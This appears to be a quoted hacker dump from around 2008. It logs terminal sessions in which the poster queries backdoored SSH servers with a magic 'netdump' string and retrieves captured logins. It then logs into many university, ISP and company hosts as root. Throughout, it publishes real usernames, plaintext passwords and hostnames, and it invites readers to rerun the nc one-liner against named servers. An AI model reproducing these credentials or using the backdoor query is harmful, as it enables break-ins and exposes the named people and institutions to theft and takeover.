> SSH2_OUT: 10.0.0.215 <http://10.0.0.215> user: lourenco pass:
LiNuX05427 (cerbero7.if.uff.int <http://cerbero7.if.uff.int>)
> SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: dionizio pass:
Zoedoulos (cerbero9.if.uff.int <http://cerbero9.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.217 <http://10.0.0.217> user: lourenco pass:
LiNuX0527 (cerbero9.if.uff.int <http://cerbero9.if.uff.int>)
> SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass:
LiNuX0527 (romario.if.uff.int <http://romario.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.222 <http://10.0.0.222> user: lourenco pass:
LiNuX527 (romario.if.uff.int <http://romario.if.uff.int>)
> SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: dionizio pass:
Zoedoulos (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass:
LiNuX0527 (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
> SSH2_OUT: 10.0.0.226 <http://10.0.0.226> user: lourenco pass:
exit (cerbero10.if.uff.int <http://cerbero10.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: jssm pass:
Jujaja (complex000.if.uff.int <http://complex000.if.uff.int>)
> SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: nuno pass:
surfar (complex000.if.uff.int <http://complex000.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.227 <http://10.0.0.227> user: pmco pass:
druida99 (complex000.if.uff.int <http://complex000.if.uff.int>)
> SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: alan pass:
ck37=2x
>
>
> SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass:
slacksucks!
> SSH2_OUT: 10.0.0.231 <http://10.0.0.231> user: root pass:
slacksucks! (urania.if.uff.int <http://urania.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass:
(damasco.if.uff.int <http://damasco.if.uff.int>)
> SSH2_OUT: 10.0.0.246 <http://10.0.0.246> user: bernardo pass:
truthno1 (damasco.if.uff.int <http://damasco.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.247 <http://10.0.0.247> user: jssm pass:
Jujaja (gould.if.uff.int <http://gould.if.uff.int>)
> SSH2_OUT: 10.0.0.44 <http://10.0.0.44> user: tgmattos pass:
CAMtgm&7
>
>
> SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira
pass: Instituto
> SSH2_OUT: 10.0.0.60 <http://10.0.0.60> user: fsilveira
pass: VaiPasSar
>
> SSH2_OUT: 10.0.0.75 <http://10.0.0.75> user: davidvaz pass:
2o3145 (DOAS-Laptop.if.uff.int <http://DOAS-Laptop.if.uff.int>)
>
> SSH2_OUT: 10.0.0.78 <http://10.0.0.78> user: alan pass:
ck37=2x (urania.if.uff.int <http://urania.if.uff.int>)
> SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass:
druida99 (urubu.if.uff.int <http://urubu.if.uff.int>)
>
>
> SSH2_OUT: 10.0.0.93 <http://10.0.0.93> user: pmco pass:
druidruida99 (urubu.if.uff.int <http://urubu.if.uff.int>)
> SSH2_OUT: 10.0.0.97 <http://10.0.0.97> user: critter pass:
559832 (ronaldinho.if.uff.int <http://ronaldinho.if.uff.int>)
>
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 203.161.120.230
<http://203.161.120.230> 22
>
>
> Trying 203.161.120.230...
> Connected to 203.161.120.230 <http://203.161.120.230>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
>
>
> pass_from: 58.7.216.153 <http://58.7.216.153> user:
root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au
<http://dsl-58-7-216-153.wa.westnet.com.au>) -> h3h3, sorry pal.
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
<mailto:root@203.161.120.230>
> root@203.161.120.230 <mailto:root@203.161.120.230>'s password:
>
>
> ----- no skynet -------
>
> Last login: Tue Aug 12 19:32:36 2008 from
dsl-58-7-216-153.wa.westnet.com.au
<http://dsl-58-7-216-153.wa.westnet.com.au>
>
> zeus:~#
> zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
> 15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00
>
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:203.161.120.230 <http://203.161.120.230>
Bcast:203.161.120.255 <http://203.161.120.255> Mask:255.255.255.240
<http://255.255.255.240>
>
>
> inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
> inet addr:11.11.11.3 <http://11.11.11.3>
Bcast:11.255.255.255 <http://11.255.255.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
>
> zeus:/usr/include/linux# ./sheader
/usr/include/linux/byteorder/ssh.h|sort|uniq|more
> SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
@pixar87
> SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
dh0st1ngd
>
>
> SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: michael pass:
ruup2it
> SSH2_OUT: 11.11.11.55 <http://11.11.11.55> user: root pass:
@pixar87
> SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
@pixar87
>
>
> SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
emaildivers
> SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: admin pass:
jugg3r0
> SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass:
@pixar887
>
>
> SSH2_OUT: 11.11.11.9 <http://11.11.11.9> user: root pass:
jugg3r0
> pass_from: 10.10.10.129 <http://10.10.10.129> user:
root pass: @pixar87
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
> central@labsec [~xoxox/h3h3] # telnet 207.145.66.12
<http://207.145.66.12> 22
> Trying 207.145.66.12...
> Connected to 207.145.66.12 <http://207.145.66.12>.
>
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.7
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> smack
> pass_from: 24.218.192.76 <http://24.218.192.76> user:
root pass: cl1pt3xt (c-24-218-192-76.hsd1.ma.comcast.net
<http://c-24-218-192-76.hsd1.ma.comcast.net>)-> sorry bro
>
>
> pass_from: 75.68.31.152 <http://75.68.31.152> user:
gman pass: 0xc0ffee (c-75-68-31-152.hsd1.nh.comcast.net
<http://c-75-68-31-152.hsd1.nh.comcast.net>) -> >:(
>
>
> central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
<mailto:root@207.145.66.12>
>
> root@207.145.66.12 <mailto:root@207.145.66.12>'s password:
>
> Last login: Wed Aug 6 23:25:38 2008 from 189.4.184.201
<http://189.4.184.201> --------->>>>>>>>>>>>>>>>>>>>>>>>>
quick question, who's that ?
>
>
>
--------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...
>
>
>
> d4:~#
> d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686
GNU/Linux
> 03:36:51 up 68 days, 4:58, 0 user, load average: 1.88, 1.80, 1.74
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
>
> inet addr:207.145.66.12 <http://207.145.66.12>
Bcast:207.145.66.255 <http://207.145.66.255> Mask:255.255.255.0
<http://255.255.255.0>
>
> inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 212.111.196.163
<http://212.111.196.163> 22
>
>
> Trying 212.111.196.163...
> Connected to 212.111.196.163 <http://212.111.196.163>.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
x4rtuhg6 (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed
you, localhost.
>
>
> pass_from: ::ffff:10.66.10.111 <http://10.66.10.111> user:
root pass: dihlordifenil --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
<mailto:root@212.111.196.163>
> root@212.111.196.163 <mailto:root@212.111.196.163>'s password:
>
>
> Last login: Fri Aug 8 19:49:52 2008 from 189.4.161.222
<http://189.4.161.222> ------------>>>>>>>>>>>>>> lets
laugh for a while now
>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux users 2.6.23-gentoo i686 ****
>
>
>
> root@users:~#
> root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET
2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
> 10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21
>
>
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
> root pts/0 10:46 0.00s 0.44s 0.00s w
> inet addr:192.168.253.3 <http://192.168.253.3>
Bcast:192.168.253.255 <http://192.168.253.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
> inet addr:169.254.78.132 <http://169.254.78.132>
Bcast:169.254.255.255 <http://169.254.255.255> Mask:255.255.0.0
<http://255.255.0.0>
>
>
> inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
> inet6 addr: ::1/128 Scope:Host
> inet addr:212.111.196.163 <http://212.111.196.163>
Bcast:212.111.196.191 <http://212.111.196.191> Mask:255.255.255.224
<http://255.255.255.224>
>
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
> inet addr:212.26.143.6 <http://212.26.143.6>
Bcast:212.26.143.7 <http://212.26.143.7> Mask:255.255.255.252
<http://255.255.255.252>
>
>
> inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 212.143.216.226
<http://212.143.216.226> 22
> Trying 212.143.216.226...
> Connected to 212.143.216.226 <http://212.143.216.226>.
>
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
>
>
> pam_from: 62.219.238.196 <http://62.219.238.196> user:
root pass: QWERFcxz (mail2.tikalnetworks.com
<http://mail2.tikalnetworks.com>) ----->>>>>>>> no kidding.
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
<mailto:root@212.143.216.226>
> root@212.143.216.226 <mailto:root@212.143.216.226>'s password:
>
>
> jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
>
> Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686
Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
> 09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
>
>
> root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3
<http://10.0.0.3>
> inet addr:10.0.0.253 <http://10.0.0.253>
Bcast:10.0.0.255 <http://10.0.0.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103
<http://143.107.133.103> 22|grep OUT
> SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user:
wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>)
>
>
> SSH2_OUT: 143.107.133.233 <http://143.107.133.233> user:
pdborges pass: mipa0529 (aegir.if.usp.br <http://aegir.if.usp.br>)
> SSH2_OUT: 143.106.42.243 <http://143.106.42.243> user:
luana pass: 103174b (athenas.cna.unicamp.br
<http://athenas.cna.unicamp.br>)
>
>
> SSH2_OUT: 143.107.133.8 <http://143.107.133.8> user:
kpp pass: fth6mdy (landauer.if.usp.br <http://landauer.if.usp.br>)
> SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user:
luana pass: 103174b (schroedinger.if.usp.br
<http://schroedinger.if.usp.br>)
>
>
> SSH2_OUT: 143.107.133.76 <http://143.107.133.76> user:
mvarella pass: CH3Ftri (planck.if.usp.br <http://planck.if.usp.br>)
> SSH2_OUT: 143.107.133.38 <http://143.107.133.38> user:
wlscopel pass: va1513zb (feynman.if.usp.br <http://feynman.if.usp.br>)
>
>
> SSH2_OUT: 143.107.133.47 <http://143.107.133.47> user:
cedric pass: KunD1cka (schroedinger.if.usp.br
<http://schroedinger.if.usp.br>)
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103
<http://143.107.133.103> 22|grep from|grep -v bullshit
>
>
> pass_from: 143.107.133.244 <http://143.107.133.244> user:
hmf18 pass: xpx9b15+ (turista.if.usp.br <http://turista.if.usp.br>)
> pass_from: 201.52.218.156 <http://201.52.218.156> user:
cedric pass: P1chona04 (c934da9c.virtua.com.br
<http://c934da9c.virtua.com.br>)
>
>
> pass_from: 201.82.105.213 <http://201.82.105.213> user:
mfsoares pass: 3p1t@xy (c95269d5.virtua.com.br
<http://c95269d5.virtua.com.br>)
> pass_from: 189.34.88.209 <http://189.34.88.209> user:
kpp pass: mdc6gpt (bd2258d1.virtua.com.br
<http://bd2258d1.virtua.com.br>)
>
>
> pass_from: 189.102.19.167 <http://189.102.19.167> user:
pontes pass: r@s&09* (bd6613a7.virtua.com.br
<http://bd6613a7.virtua.com.br>)
> pass_from: 189.102.98.126 <http://189.102.98.126> user:
lassali pass: las2008ro (bd66627e.virtua.com.br
<http://bd66627e.virtua.com.br>)
>
>
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103
<mailto:root@143.107.133.103> 'uname -a'
> root@143.107.133.103 <mailto:root@143.107.133.103>'s password:
>
>
> Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007
x86_64 x86_64 x86_64 GNU/Linux
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.144.186.37
<http://200.144.186.37> 22
>
>
> Trying 200.144.186.37...
> Connected to shark.lcca.usp.br <http://shark.lcca.usp.br>
(200.144.186.37 <http://200.144.186.37>).
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.3
>
netdump
--------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got
tired, u knoW
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: amazonas pass:
UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im
almost stopping pasting stuff
>
>
>
> -> alot of kool shit regarding usp.br <http://usp.br> here
> try yourself-> echo netdump|nc 200.144.186.37
<http://200.144.186.37> 22|grep usp.br <http://usp.br>
>
> or just grep OUT
>
>
> kthxnpurwelcome
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74
<http://200.145.203.74> 22|grep localhost
>
>
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :)
kind of makes it easy
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
<mailto:root@200.145.203.74>
> root@200.145.203.74 <mailto:root@200.145.203.74>'s password:
>
>
> Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br
<http://nemo.df.ibilce.unesp.br>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux hobbes 2.6.18-6-686 i686 ****
>
>
>
> root@hobbes:~#
> root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686
GNU/Linux
> 05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06
>
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> rico :0 - 06Aug08 ?xdm? 5:39 0.71s
x-session-manager
> inet addr:200.145.203.74 <http://200.145.203.74>
Bcast:200.145.203.255 <http://200.145.203.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
> inet addr:127.0.0.1 <http://127.0.0.1> Mask:255.0.0.0
<http://255.0.0.0>
> inet6 addr: ::1/128 Scope:Host
>
> root@hobbes:~#
>
>
> central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74
<http://200.145.203.74> 22|grep unesp
> pass_from: 200.145.203.42 <http://200.145.203.42> user:
rico pass: so31fia12 (nemo.df.ibilce.unesp.br
<http://nemo.df.ibilce.unesp.br>)
>
>
> SSH2_OUT: 200.145.203.42 <http://200.145.203.42> user:
ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br
<http://nemo.df.ibilce.unesp.br>)
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 67.15.56.12
<http://67.15.56.12> 22
> Trying 67.15.56.12...
> Connected to 67.15.56.12 <http://67.15.56.12>.
> Escape character is '^]'.
>
> SSH-1.99-OpenSSH_3.9
>
> netdump
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
l3nny1nt3l (localhost)
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: lenny pass:
l3nny1nt3l (localhost)
>
>
> pass_from: 76.188.180.141 <http://76.188.180.141> user:
joe pass: 1207j0s3ph7ys0n9813
(cpe-76-188-180-141.neo.res.rr.com
<http://cpe-76-188-180-141.neo.res.rr.com>)
>
> pass_from: 76.188.180.141 <http://76.188.180.141> user:
devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com
<http://cpe-76-188-180-141.neo.res.rr.com>)
>
>
> pass_from: 76.188.180.141 <http://76.188.180.141> user:
celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com
<http://cpe-76-188-180-141.neo.res.rr.com>)
>
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
<mailto:root@67.15.56.12>
>
> root@67.15.56.12 <mailto:root@67.15.56.12>'s password:
>
> Last login: Tue Aug 12 00:51:58 2008 from
c-98-234-65-222.hsd1.ca.comcast.net
<http://c-98-234-65-222.hsd1.ca.comcast.net>
>
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux f1.celtrust.com
<http://f1.celtrust.com> 2.6.9-34.ELsmp i686 ****
>
>
>
> [root[@f1 ~]#
> [root[@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux f1.celtrust.com <http://f1.celtrust.com> 2.6.9-34.ELsmp #1
SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
>
> 05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:67.15.56.12 <http://67.15.56.12>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.254.0
<http://255.255.254.0>
>
>
> inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
> inet addr:67.15.57.240 <http://67.15.57.240>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
> inet addr:67.15.57.241 <http://67.15.57.241>
Bcast:67.15.57.255 <http://67.15.57.255> Mask:255.255.255.0
<http://255.255.255.0>
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
> central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
<mailto:root@66.119.174.19>
> root@66.119.174.19 <mailto:root@66.119.174.19>'s password:
>
>
>
>
> **** Connected to ****
>
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
>
>
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux res1.van.metrobridge.net
<http://res1.van.metrobridge.net> 2.6.18-5-686 i686 ****
>
>
>
> root@res1:~#
> root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux res1.van.metrobridge.net <http://res1.van.metrobridge.net>
2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
>
> 12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> sky pts/0 66.119.176.2 <http://66.119.176.2> 11:41
1:12 0.00s 0.00s -bash
> sky pts/3 66.119.176.2 <http://66.119.176.2> Tue15
20:53 0.18s 0.00s sshd: sky [priv]
>
>
> sky pts/6 66.119.176.2 <http://66.119.176.2> 11:42
1:10 0.16s 0.01s sshd: sky [priv]
> vee pts/7 74.221.143.3 <http://74.221.143.3> 12:23
28:41m 0.07s 0.00s telnet seton-3550
>
>
> inet addr:66.119.174.4 <http://66.119.174.4>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240
<http://255.255.255.240>
>
> inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
>
> inet addr:66.119.174.29 <http://66.119.174.29>
Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240
<http://255.255.255.240>
>
> inet addr:65.39.152.235 <http://65.39.152.235>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224
<http://255.255.255.224>
>
>
> inet addr:65.39.152.237 <http://65.39.152.237>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224
<http://255.255.255.224>
>
> inet addr:66.119.174.19 <http://66.119.174.19>
Bcast:66.119.174.31 <http://66.119.174.31> Mask:255.255.255.240
<http://255.255.255.240>
>
>
> inet addr:65.39.152.239 <http://65.39.152.239>
Bcast:65.39.152.255 <http://65.39.152.255> Mask:255.255.255.224
<http://255.255.255.224>
>
> inet addr:66.119.174.3 <http://66.119.174.3>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240
<http://255.255.255.240>
>
>
> inet addr:66.119.174.2 <http://66.119.174.2>
Bcast:66.119.174.15 <http://66.119.174.15> Mask:255.255.255.240
<http://255.255.255.240>
>
>
> pass_from: 66.119.176.2 <http://66.119.176.2> user:
simon pass: pass77 (mail.metrobridge.com
<http://mail.metrobridge.com>) [whole metrobridge with the same pass]
>
>
> pass_from: 66.119.176.2 <http://66.119.176.2> user:
sky pass: rotoFro7 (mail.metrobridge.com
<http://mail.metrobridge.com>) [whole metrobridge with the same pass]
>
>
> have fun
>
>
> - what a shame.. again, metrobridge ? i told you to keep on eye on
your sshd since your zine :(
>
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
<mailto:root@200.239.200.102>
> root@200.239.200.102 <mailto:root@200.239.200.102>'s password:
>
>
> Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
<http://stml030.microlink.com.br>
>
> Linux 2.6.11.12-ul1.
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
>
>
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
>
>
> **** Linux proxy2-rj 2.6.11.12-ul1 i686 ****
>
> root@proxy2-rj:~#
> root@proxy2-rj:~# uname -a;hostname -f;w
> Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686
unknown
> proxy2-rj.pop-rio.com.br <http://proxy2-rj.pop-rio.com.br>
>
>
> 17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> root@proxy2-rj:~#
> root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
>
>
> pass_from: 200.239.245.50 <http://200.239.245.50> user:
root pass: Beth01@ (gwpr03.microlink.com.br
<http://gwpr03.microlink.com.br>)
> pass_from: 200.239.245.70 <http://200.239.245.70> user:
root pass: pa$$w0rd (Froes.microlink.com.br
<http://Froes.microlink.com.br>)
>
>
> root@proxy2-rj:~# ./sshread mac.h|grep OUT
> SSH2_OUT: 127.0.0.1 <http://127.0.0.1> user: root pass:
BuCaaAadd (localhost) -----> /me laughs
>
>
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
>
>
> central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
<mailto:root@143.107.250.214>
> root@143.107.250.214 <mailto:root@143.107.250.214>'s password:
>
>
> Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br
<http://143-107-55-100.iq.usp.br>
>
>
> ..... !! HELLO WORLD !! .....
>
